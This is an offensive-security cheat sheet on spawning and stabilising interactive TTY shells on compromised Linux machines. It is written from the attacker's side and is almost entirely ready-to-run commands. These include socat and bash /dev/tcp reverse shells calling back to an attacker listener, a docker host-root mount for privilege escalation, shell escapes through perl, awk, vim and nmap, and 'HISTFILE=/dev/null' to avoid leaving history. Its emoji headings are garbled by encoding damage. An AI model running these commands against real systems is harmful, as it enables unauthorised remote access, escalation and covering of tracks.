# Spawn TTY Shells ## ๐Ÿ”ง Python Methods ```bash python -c 'import pty; pty.spawn("/bin/bash")' ``` ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` You can also use: ```bash python -c 'import os; os.system("/bin/bash")' ``` ## ๐Ÿ Socat Methods (from attacker and victim) On attacker (listener): ```bash socat file:`tty`,raw,echo=0 tcp-listen:4444 ``` On victim (reverse shell): ```bash socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::4444 ``` ## ๐Ÿฆ€ Script Method (if available on the system) ```bash script /dev/null -c bash ``` ### ๐Ÿง  Regaining Full Terminal Control 1. Suspend with `Ctrl + Z` 2. On the attacker host: ```bash stty raw -echo; fg reset xterm ``` ### ๐Ÿ“ฆ Ensuring Terminal Configuration ```bash echo $TERM # Verify terminal type export TERM=xterm # Set terminal type if needed export SHELL=/bin/bash # Force bash if possible ``` ### ๐Ÿ–ผ Adjusting Window Size (prevents errors when using programs like `nano`, `htop`, etc.) 1. On the attacker host: ```bash stty size # Example output: 30 127 ``` 2. On the remote shell: ```bash stty rows 30 columns 127 ``` ## ๐Ÿ“Ÿ /dev/tcp and Bash Method (interactive reverse shell) ```bash bash -i >& /dev/tcp//4444 0>&1 ``` Once connected, you can upgrade the shell with stty (explained below). ## ๐Ÿš Shell Upgrade with System Commands (stty and export) Once you use any of the above methods (like python -c 'pty.spawn(...)'), you can further improve it with: ```bash CTRL+Z # Pause the shell and return to your local terminal stty raw -echo; fg ``` Then, type: ```bash reset export SHELL=bash export TERM=xterm-256color stty rows columns # Adjust size if needed ``` ## ๐Ÿงฌ With Perl ```bash perl -e 'exec "/bin/bash";' ``` Or with pseudo-terminal: ```bash perl -e 'use POSIX; POSIX::setsid(); exec "/bin/bash";' ``` ## โ˜• With Java If Runtime.exec() is accessible: ```java Runtime.getRuntime().exec("/bin/bash"); ``` (Generally not very useful manually, but useful in Java app exploitation). ## ๐Ÿฆฅ With Lua ```bash lua -e "os.execute('/bin/bash')" ``` ## ๐Ÿงฑ With Awk ```bash awk 'BEGIN {system("/bin/bash")}' ``` ## ๐Ÿงช With Tcl ```bash tclsh exec /bin/bash ``` ## ๐Ÿงžโ€โ™‚๏ธ With vi or vim (command mode) ```bash vim :!bash ``` Or: ```bash vim -c ':!bash' ``` ## ๐Ÿ–‹๏ธ With nmap (if it has scripting with --interactive) ```bash nmap --interactive !sh ``` ## ๐Ÿ’พ With Docker / Chroot / chsh if you have permissions ```bash docker run -v /:/mnt --rm -it alpine chroot /mnt sh ``` Or if you can change your shell: ```bash chsh -s /bin/bash ``` ## ๐Ÿง  Useful Tips If you have a shell without colors or history, export: ```bash export TERM=xterm-256color export HISTFILE=/dev/null ``` To check if a TTY is assigned: ```bash tty ```